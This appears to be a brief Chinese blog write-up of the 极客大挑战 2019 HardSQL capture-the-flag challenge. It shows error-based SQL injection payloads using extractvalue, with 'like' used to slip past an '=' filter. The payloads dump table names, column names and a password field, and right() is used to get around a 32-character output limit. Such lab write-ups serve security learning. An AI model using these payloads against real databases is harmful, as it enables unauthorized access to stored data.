[极客大挑战 2019]HardSQL

  • 首先拿到题目,使用 ' 进行尝试,发现输出了错误信息,直接使用报错注入的方式尝试

  • 在尝试的过程中发现过滤了=,这里我们可以使用like进行替换,然后就是正常的报错注入流程了

    1. 爆名

      admin'or(extractvalue(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like(database())))))#
      
    2. 爆字段

      admin'or(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')))))#
      
    3. 查数据

      admin'or(extractvalue(1,concat(0x7e,(select(password)from(H4rDsq1)))))#
      

这里最关键的点来了,我们爆出来的是部分flag

extractvalue和updatexml只显示32围字符

所以我们需要使用right()函数爆出右边的部分flag

posted @ 2021-11-12 21:28  Lzwhehe  阅读(71)  评论(0)    收藏  举报